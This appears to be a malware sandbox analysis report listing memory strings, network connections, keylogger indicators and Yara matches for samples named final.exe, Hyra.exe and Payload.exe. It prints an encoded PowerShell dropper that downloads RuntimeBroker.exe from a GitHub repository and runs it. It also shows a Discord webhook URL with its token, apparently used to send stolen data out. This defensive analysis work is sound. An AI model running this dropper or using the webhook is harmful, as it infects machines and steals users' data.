Source: javaw.exe, 0000000C.00000003.1696246534.0000000014F66000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://xml.apache.org/xslt
Source: javaw.exe, 0000000C.00000002.3929782050.0000000018C5C000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000C.00000003.1588723004.0000000018C0F000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000C.00000003.1588901481.0000000018C4D000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000C.00000002.3911788928.000000000A1E7000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://xml.org/sax/features/
Source: javaw.exe, 0000000C.00000002.3918467886.0000000014EE0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://xml.org/sax/features/allow-dtd-events-after-endDTD
Source: javaw.exe, 0000000C.00000002.3918467886.0000000014EE0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://xml.org/sax/features/external-general-entities
Source: javaw.exe, 0000000C.00000002.3918467886.0000000014EE0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://xml.org/sax/features/external-parameter-entities
Source: javaw.exe, 0000000C.00000003.2679299474.0000000014F67000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000C.00000003.1595223189.0000000014F5F000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000C.00000003.1696246534.0000000014F66000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://xml.org/sax/features/namespace-prefixes
Source: javaw.exe, 0000000C.00000003.2679299474.0000000014F67000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000C.00000003.1595223189.0000000014F5F000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000C.00000003.1696246534.0000000014F66000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://xml.org/sax/features/namespace-prefixes-
Source: javaw.exe, 0000000C.00000003.2679299474.0000000014F67000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000C.00000003.1595223189.0000000014F5F000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000C.00000003.1696246534.0000000014F66000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://xml.org/sax/features/namespaces
Source: javaw.exe, 0000000C.00000003.2679299474.0000000014F67000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000C.00000003.1595223189.0000000014F5F000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000C.00000003.1696246534.0000000014F66000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://xml.org/sax/features/namespaces&
Source: javaw.exe, 0000000C.00000002.3917502159.0000000014B06000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://xml.org/sax/features/string-interning
Source: javaw.exe, 0000000C.00000002.3917502159.0000000014B06000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://xml.org/sax/features/string-interningfeature
Source: javaw.exe, 0000000C.00000003.2679299474.0000000014F67000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000C.00000003.1595223189.0000000014F5F000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000C.00000003.1696246534.0000000014F66000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://xml.org/sax/features/use-entity-resolver2
Source: javaw.exe, 0000000C.00000003.2679299474.0000000014F67000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000C.00000003.1595223189.0000000014F5F000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000C.00000003.1696246534.0000000014F66000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://xml.org/sax/features/validation
Source: javaw.exe, 0000000C.00000002.3918467886.0000000014EE0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://xml.org/sax/properties/
Source: javaw.exe, 0000000C.00000003.2679299474.0000000014F67000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000C.00000003.1595223189.0000000014F5F000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000C.00000003.1696246534.0000000014F66000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://xml.org/sax/properties/lexical-handler
Source: javaw.exe, 0000000C.00000002.3918467886.0000000014EE0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://xml.org/sax/properties/xml-string
Source: powershell.exe, 00000005.00000002.2580860064.0000020D95640000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2580860064.0000020D95607000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1628873409.000002208E560000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1628873409.000002208E527000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1820608682.00000254121D1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000009.00000002.1820608682.00000254137ED000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.github.com/_private/browser/errors
Source: powershell.exe, 00000009.00000002.1820608682.00000254137ED000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.github.com/_private/browser/stats
Source: powershell.exe, 00000009.00000002.1820608682.00000254137ED000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://avatars.githubusercontent.com
Source: powershell.exe, 00000009.00000002.1820608682.00000254137ED000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://collector.github.com/github/collect
Source: powershell.exe, 00000009.00000002.2284762070.0000025422383000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000009.00000002.2284762070.0000025422383000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000009.00000002.2284762070.0000025422383000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/License
Source: virus.exe.bin.exe, 00000000.00000002.1457358254.0000000013560000.00000004.00000800.00020000.00000000.sdmp, Hyra.exe, 00000002.00000002.1558924287.0000000012AB5000.00000004.00000800.00020000.00000000.sdmp, final.exe, 0000000B.00000002.1629517817.0000000013345000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://discordapp.com/api/webhooks/1352684770521387070/EnDdIPnq1Toz0toXGIhTo1T09Jq8MMJhXvjTWp5MjXqB
Source: powershell.exe, 00000009.00000002.1820608682.00000254137ED000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://docs.github.com
Source: powershell.exe, 00000009.00000002.1820608682.00000254137ED000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://docs.github.com/get-started/accessibility/keyboard-shortcuts
Source: powershell.exe, 00000009.00000002.1820608682.00000254137ED000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github-cloud.s3.amazonaws.com
Source: powershell.exe, 00000009.00000002.1820608682.00000254137ED000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.blog
Source: powershell.exe, 00000009.00000002.1820608682.00000254137ED000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1820608682.0000025412E02000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com
Source: powershell.exe, 00000009.00000002.1820608682.00000254137ED000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/AnonAm0369/am/raw/refs/heads
Source: powershell.exe, 00000009.00000002.1820608682.00000254137ED000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1820608682.0000025412E02000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1820608682.00000254121D1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/AnonAm0369/am/raw/refs/heads/main/RuntimeBroker.exe
Source: powershell.exe, 00000009.00000002.1820608682.00000254137ED000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/AnonAm0369/am/raw/refs/heads/main/RuntimeBroker.exe&quot;
Source: powershell.exe, 00000009.00000002.1820608682.00000254137ED000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/AnonAm0369/am/raw/refs/headsp
Source: powershell.exe, 00000009.00000002.1820608682.0000025412402000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000009.00000002.1820608682.00000254137ED000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/collections
Source: powershell.exe, 00000009.00000002.1820608682.00000254137ED000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/customer-stories
Source: powershell.exe, 00000009.00000002.1820608682.00000254137E5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/ente
Source: powershell.exe, 00000009.00000002.1820608682.00000254137ED000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/enterprise
Source: powershell.exe, 00000009.00000002.1820608682.00000254137ED000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/enterprise/startups
Source: powershell.exe, 00000009.00000002.1820608682.00000254137ED000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/features
Source: powershell.exe, 00000009.00000002.1820608682.00000254137ED000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/features/actions
Source: powershell.exe, 00000009.00000002.1820608682.00000254137ED000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/features/code-review
Source: powershell.exe, 00000009.00000002.1820608682.00000254137ED000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/features/code-search
Source: powershell.exe, 00000009.00000002.1820608682.00000254137ED000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/features/codespaces
Source: powershell.exe, 00000009.00000002.1820608682.00000254137ED000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/features/copilot
Source: powershell.exe, 00000009.00000002.1820608682.00000254137ED000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/features/discussions
Source: powershell.exe, 00000009.00000002.1820608682.00000254137ED000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/features/issues
Source: powershell.exe, 00000009.00000002.1820608682.00000254137ED000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/features/security
Source: powershell.exe, 00000009.00000002.1820608682.00000254137ED000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/fluidicon.png
Source: powershell.exe, 00000009.00000002.1820608682.00000254137ED000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/readme
Source: powershell.exe, 00000009.00000002.1820608682.00000254137ED000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/resources/whitepapers
Source: powershell.exe, 00000009.00000002.1820608682.00000254137ED000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/solutions/executive-insights
Source: powershell.exe, 00000009.00000002.1820608682.00000254137ED000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/team
Source: powershell.exe, 00000009.00000002.1820608682.00000254137ED000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/topics
Source: powershell.exe, 00000009.00000002.1820608682.00000254137ED000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/trending
Source: powershell.exe, 00000009.00000002.1820608682.00000254137ED000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.githubassets.com
Source: powershell.exe, 00000009.00000002.1820608682.00000254137ED000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.githubassets.com/
Source: powershell.exe, 00000009.00000002.1820608682.00000254137ED000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.githubassets.com/assets/app_assets_modules_github_behaviors_ajax-error_ts-app_assets_
Source: powershell.exe, 00000009.00000002.1820608682.00000254137ED000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.githubassets.com/assets/app_assets_modules_github_behaviors_commenting_edit_ts-app_as
Source: powershell.exe, 00000009.00000002.1820608682.00000254137ED000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.githubassets.com/assets/app_assets_modules_github_behaviors_task-list_ts-app_assets_m
Source: powershell.exe, 00000009.00000002.1820608682.00000254137ED000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.githubassets.com/assets/app_assets_modules_github_sticky-scroll-into-view_ts-3e000c5d
Source: powershell.exe, 00000009.00000002.1820608682.00000254137ED000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.githubassets.com/assets/behaviors-7ebb6421bf22.js
Source: powershell.exe, 00000009.00000002.1820608682.00000254137ED000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.githubassets.com/assets/dark-8a995f0bacd4.css
Source: powershell.exe, 00000009.00000002.1820608682.00000254137ED000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.githubassets.com/assets/dark_colorblind-cd826e8636dc.css
Source: powershell.exe, 00000009.00000002.1820608682.00000254137ED000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.githubassets.com/assets/dark_dimmed-f
Source: powershell.exe, 00000009.00000002.1820608682.00000254137ED000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.githubassets.com/assets/dark_dimmed-f37fb7684b1f.css
Source: powershell.exe, 00000009.00000002.1820608682.00000254137ED000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.githubassets.com/assets/dark_dimmed-fp
Source: powershell.exe, 00000009.00000002.1820608682.00000254137ED000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.githubassets.com/assets/dark_high_contrast-9ac301c3ebe5.css
Source: powershell.exe, 00000009.00000002.1820608682.00000254137ED000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.githubassets.com/assets/dark_tritanopia-18119e682df0.css
Source: powershell.exe, 00000009.00000002.1820608682.00000254137ED000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.githubassets.com/assets/element-registry-0bebfa1427c4.js
Source: powershell.exe, 00000009.00000002.1820608682.00000254137ED000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.githubassets.com/assets/environment-f04cb2a9fc8c.js
Source: powershell.exe, 00000009.00000002.1820608682.00000254137ED000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.githubassets.com/assets/error-3bfb6168c7d5.css
Source: powershell.exe, 00000009.00000002.1820608682.00000254137ED000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.githubassets.com/assets/github-43ae85d4871b.css
Source: powershell.exe, 00000009.00000002.1820608682.00000254137ED000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.githubassets.com/assets/github-elements-394f8eb34f19.js
Source: powershell.exe, 00000009.00000002.1820608682.00000254137ED000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.githubassets.com/assets/github-logo-55c5b9a1fe52.png
Source: powershell.exe, 00000009.00000002.1820608682.00000254137ED000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.githubassets.com/assets/github-mark-57519b92ca4e.png
Source: powershell.exe, 00000009.00000002.1820608682.00000254137ED000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.githubassets.com/assets/github-octocat-13c86b8b336d.png
Source: powershell.exe, 00000009.00000002.1820608682.00000254137ED000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.githubassets.com/assets/global-7d4d2344e7ab.css
Source: powershell.exe, 00000009.00000002.1820608682.00000254137ED000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.githubassets.com/assets/global-banner-disable-f988792be49f.js
Source: powershell.exe, 00000009.00000002.1820608682.00000254137ED000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.githubassets.com/assets/keyboard-shortcuts-dialog-33dfb803e078.js
Source: powershell.exe, 00000009.00000002.1820608682.00000254137ED000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.githubassets.com/assets/light-74231a1f3bbb.css
Source: powershell.exe, 00000009.00000002.1820608682.00000254137ED000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.githubassets.com/assets/light_colorblind-f91b0f603451.css
Source: powershell.exe, 00000009.00000002.1820608682.00000254137ED000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.githubassets.com/assets/light_high_contrast-83beb16e0ecf.css
Source: powershell.exe, 00000009.00000002.1820608682.00000254137ED000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.githubassets.com/assets/light_tritanopia-6e122dab64fc.css
Source: powershell.exe, 00000009.00000002.1820608682.00000254137ED000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.githubassets.com/assets/mona-sans-d1bf285e9b9b.woff2
Source: powershell.exe, 00000009.00000002.1820608682.00000254137ED000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.githubassets.com/assets/notifications-global-01e85cd1be94.js
Source: powershell.exe, 00000009.00000002.1820608682.00000254137ED000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.githubassets.com/assets/octicons-react-cf2f2ab8dab4.js
Source: powershell.exe, 00000009.00000002.1820608682.00000254137ED000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.githubassets.com/assets/pinned-octocat-093da3e6fa40.svg
Source: powershell.exe, 00000009.00000002.1820608682.00000254137ED000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.githubassets.com/assets/primer-aaa714e5674d.css
Source: powershell.exe, 00000009.00000002.1820608682.00000254137ED000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.githubassets.com/assets/primer-primitives-225433424a87.css
Source: powershell.exe, 00000009.00000002.1820608682.00000254137ED000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.githubassets.com/assets/primer-react-e05a7c4c5398.js
Source: powershell.exe, 00000009.00000002.1820608682.00000254137ED000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.githubassets.com/assets/primer-react.50398dad705ce9fff192.module.css
Source: powershell.exe, 00000009.00000002.1820608682.00000254137ED000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.githubassets.com/assets/react-core-8d75451d837a.js
Source: powershell.exe, 00000009.00000002.1820608682.00000254137ED000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.githubassets.com/assets/react-lib-f1bca44e0926.js
Source: powershell.exe, 00000009.00000002.1820608682.00000254137ED000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.githubassets.com/assets/sessions-730dca81d0a2.js
Source: powershell.exe, 00000009.00000002.1820608682.00000254137ED000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.githubassets.com/assets/site-3e72ff5534e0.css
Source: powershell.exe, 00000009.00000002.1820608682.00000254137ED000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.githubassets.com/assets/ui_packages_failbot_failbot_ts-75968cfb5298.js
Source: powershell.exe, 00000009.00000002.1820608682.00000254137ED000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.githubassets.com/assets/ui_packages_ui-commands_ui-commands_ts-46ae788e9cbd.js
Source: powershell.exe, 00000009.00000002.1820608682.00000254137ED000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.githubassets.com/assets/ui_packages_updatable-content_updatable-content_ts-2a55124d5c
Source: powershell.exe, 00000009.00000002.1820608682.00000254137ED000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.githubassets.com/assets/vendors-node_modules_braintree_browser-detection_dist_browser
Source: powershell.exe, 00000009.00000002.1820608682.00000254137ED000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.githubassets.com/assets/vendors-node_modules_color-convert_index_js-e3180fe3bcb3.js
Source: powershell.exe, 00000009.00000002.1820608682.00000254137ED000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.githubassets.com/assets/vendors-node_modules_delegated-events_dist_index_js-node_modu
Source: powershell.exe, 00000009.00000002.1820608682.00000254137ED000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.githubassets.com/assets/vendors-node_modules_emotion_is-prop-valid_dist_emotion-is-pr
Source: powershell.exe, 00000009.00000002.1820608682.00000254137ED000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.githubassets.com/assets/vendors-node_modules_github_arianotify-polyfill_ariaNotify-po
Source: powershell.exe, 00000009.00000002.1820608682.00000254137ED000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.githubassets.com/assets/vendors-node_modules_github_auto-complete-element_dist_index_
Source: powershell.exe, 00000009.00000002.1820608682.00000254137ED000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.githubassets.com/assets/vendors-node_modules_github_file-attachment-element_dist_inde
Source: powershell.exe, 00000009.00000002.1820608682.00000254137ED000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.githubassets.com/assets/vendors-node_modules_github_filter-input-element_dist_index_j
Source: powershell.exe, 00000009.00000002.1820608682.00000254137ED000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.githubassets.com/assets/vendors-node_modules_github_markdown-toolbar-element_dist_ind
Source: powershell.exe, 00000009.00000002.1820608682.00000254137ED000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.githubassets.com/assets/vendors-node_modules_github_mini-throttle_dist_index_js-node_
Source: powershell.exe, 00000009.00000002.1820608682.00000254137ED000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.githubassets.com/assets/vendors-node_modules_github_quote-selection_dist_index_js-nod
Source: powershell.exe, 00000009.00000002.1820608682.00000254137ED000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.githubassets.com/assets/vendors-node_modules_github_relative-time-element_dist_index_
Source: powershell.exe, 00000009.00000002.1820608682.00000254137ED000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.githubassets.com/assets/vendors-node_modules_github_remote-form_dist_index_js-node_mo
Source: powershell.exe, 00000009.00000002.1820608682.00000254137ED000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.githubassets.com/assets/vendors-node_modules_github_selector-observer_dist_index_esm_
Source: powershell.exe, 00000009.00000002.1820608682.00000254137ED000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.githubassets.com/assets/vendors-node_modules_github_text-expander-element_dist_index_
Source: powershell.exe, 00000009.00000002.1820608682.00000254137ED000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.githubassets.com/assets/vendors-node_modules_github_turbo_dist_turbo_es2017-esm_js-a0
Source: powershell.exe, 00000009.00000002.1820608682.00000254137ED000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.githubassets.com/assets/vendors-node_modules_lit-html_lit-html_js-be8cb88f4
Source: powershell.exe, 00000009.00000002.1820608682.00000254137ED000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.githubassets.com/assets/vendors-node_modules_lit-html_lit-html_js-be8cb88f481b.js
Source: powershell.exe, 00000009.00000002.1820608682.00000254137ED000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.githubassets.com/assets/vendors-node_modules_lit-html_lit-html_js-be8cb88f4p
Source: powershell.exe, 00000009.00000002.1820608682.00000254137ED000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.githubassets.com/assets/vendors-node_modules_oddbird_popover-polyfill_dist_popover-fn
Source: powershell.exe, 00000009.00000002.1820608682.00000254137ED000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.githubassets.com/assets/vendors-node_modules_oddbird_popover-polyfill_dist_popover_js
Source: powershell.exe, 00000009.00000002.1820608682.00000254137ED000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.githubassets.com/assets/vendors-node_modules_primer_behaviors_dist_esm_index_mjs-0dbb
Source: powershell.exe, 00000009.00000002.1820608682.00000254137ED000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.githubassets.com/assets/wp-runtime-da74d68ae715.js
Source: powershell.exe, 00000009.00000002.1820608682.00000254137ED000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.githubassets.com/favicons/favicon
Source: powershell.exe, 00000009.00000002.1820608682.00000254137ED000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.githubassets.com/favicons/favicon.png
Source: powershell.exe, 00000009.00000002.1820608682.00000254137ED000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.githubassets.com/favicons/favicon.svg
Source: powershell.exe, 00000009.00000002.1820608682.0000025412E02000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://go.micro
Source: powershell.exe, 00000009.00000002.2284762070.0000025422240000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2284762070.0000025422383000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://nuget.org/nuget.exe
Source: powershell.exe, 00000009.00000002.1820608682.00000254137ED000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://partner.github.com
Source: virus.exe.bin.exe, 00000000.00000002.1457358254.0000000013560000.00000004.00000800.00020000.00000000.sdmp, Hyra.exe, 00000002.00000002.1558924287.0000000012AB5000.00000004.00000800.00020000.00000000.sdmp, final.exe, 0000000B.00000002.1629517817.0000000013345000.00000004.00000800.00020000.00000000.sdmp, final.exe, 0000000B.00000002.1598765313.000000000337B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://pastebin.com/raw/???
Source: powershell.exe, 00000009.00000002.1820608682.00000254137ED000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://resources.github.com
Source: powershell.exe, 00000009.00000002.1820608682.00000254137ED000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://resources.github.com/learn/pathways
Source: powershell.exe, 00000009.00000002.1820608682.00000254137ED000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://skills.github.com
Source: powershell.exe, 00000009.00000002.1820608682.00000254137ED000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://user-images.githubusercontent.com/
Source: final.exe, 0000000B.00000002.1629517817.0000000013345000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.newtonsoft.com/jsonschema
Source: virus.exe.bin.exe, 00000000.00000002.1457358254.0000000013560000.00000004.00000800.00020000.00000000.sdmp, Hyra.exe, 00000002.00000002.1558924287.0000000012AB5000.00000004.00000800.00020000.00000000.sdmp, final.exe, 0000000B.00000002.1629517817.0000000013345000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.nuget.org/packages/Newtonsoft.Json.Bson
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49685
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49684
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49683
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49682
Source: unknown Network traffic detected: HTTP traffic on port 49685 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49683 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49684 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49682 -> 443
Source: unknown HTTPS traffic detected: 172.67.74.152:443 -> 192.168.2.6:49682 version: TLS 1.2
Source: unknown HTTPS traffic detected: 162.159.129.233:443 -> 192.168.2.6:49684 version: TLS 1.2
Source: unknown HTTPS traffic detected: 140.82.113.3:443 -> 192.168.2.6:49685 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing

Source: Payload.exe.11.dr, kl.cs .Net Code: VKCodeToUnicode
Source: 11.2.final.exe.3758448.0.raw.unpack, kl.cs .Net Code: VKCodeToUnicode

E-Banking Fraud

Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc 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
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc JAB1AHIAbAAgAD0AIAAiAGgAdAB0AHAAcwA6AC8ALwBnAGkAdABoAHUAYgAuAGMAbwBtAC8AQQBuAG8AbgBBAG0AMAAzADYAOQAvAGEAbQAvAHIAYQB3AC8AcgBlAGYAcwAvAGgAZQBhAGQAcwAvAG0AYQBpAG4ALwBSAHUAbgB0AGkAbQBlAEIAcgBvAGsAZQByAC4AZQB4AGUAIgANAAoAJABvAHUAdABwAHUAdAAgAD0AIAAiACQAZQBuAHYAOgBUAGUAbQBwAC8AUgB1AG4AdABpAG0AZQBCAHIAbwBrAGUAcgAuAGUAeABlACIADQAKAEkAbgB2AG8AawBlAC0AVwBlAGIAUgBlAHEAdQBlAHMAdAAgAC0AVQByAGkAIAAkAHUAcgBsACAALQBPAHUAdABGAGkAbABlACAAJABvAHUAdABwAHUAdAANAAoAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAC0ARgBpAGwAZQBQAGEAdABoACAAJABvAHUAdABwAHUAdAA=
Source: Yara match File source: virus.exe.bin.exe, type: SAMPLE
Source: Yara match File source: 11.2.final.exe.3758448.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.Hyra.exe.12ababba.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.final.exe.133459a2.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.Payload.exe.2a6fef8.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.0.Payload.exe.470000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.final.exe.3758448.0.raw.unpack, type: UNPACKEDPE
